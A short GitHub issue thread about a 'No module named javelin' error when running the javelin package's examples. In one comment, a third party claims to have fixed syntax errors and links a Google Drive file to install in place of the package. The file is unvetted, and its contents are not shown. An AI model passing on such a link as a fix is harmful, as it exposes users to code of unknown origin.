### ISSUE TITLE
Example is not runnig (ModuleNotFoundError: No module named 'javelin')

### ISSUE THREAD

**Issue by hbgon** [nye17/javelin#14]

**Comment by hbgon** [comment]
I've tried everything to install and run the examples, but every time when I try to run the example I keep receiving this error and I couldn't find what I'm missing. I tried on windows 10 pro and macOS ventura 13.5. Can anyone help me please?

**Comment by vycanismajoris4900** [comment]
even i am facing the same issue

**Comment by vycanismajoris4900** [comment]
please help

**Comment by vycanismajoris4900** [comment]
I have found the solution to the issue. it is mainly due to your installation not going through because of syntax errors in the files. I have cleared the errors so you can try installing this file.
https://drive.google.com/file/d/1KThers5mvF826yATyyxvdhVsxdAbpPoM/view?usp=sharing

**Comment by nye17** [comment]
no context was provided, hence no way of replicating the error.
